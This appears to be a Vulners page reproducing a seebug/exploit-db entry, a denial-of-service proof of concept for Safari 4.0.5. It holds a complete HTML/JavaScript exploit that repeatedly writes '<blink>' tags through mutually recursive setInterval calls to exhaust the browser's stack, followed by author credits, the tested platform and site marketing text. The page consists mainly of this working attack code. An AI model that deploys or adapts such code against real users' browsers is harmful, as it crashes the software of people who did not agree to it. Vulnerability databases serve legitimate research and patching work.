Lucene search
K

Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion DoS

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Webkit Safari 4.0.5 Blink Tag Stack Exhaustion Do

Code

                                                <html>
<script>
loop1();
    var a = "<blink>";
function loop1()
{
	document.write(a);
    setInterval(loop2,0);
}
function loop2()
{
	document.write(a);
	setInterval(loop1,0);
}
</script>
<body>
Webkit (Safari) Stack Exhaustion DoS
Found By:	Dr_IDE
Credit To:	Mattias Karlsson
Reference:	http://www.exploit-db.com/exploits/12401
Tested On:	Windows 7 + Safari 4.0.5
</body>
</html>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation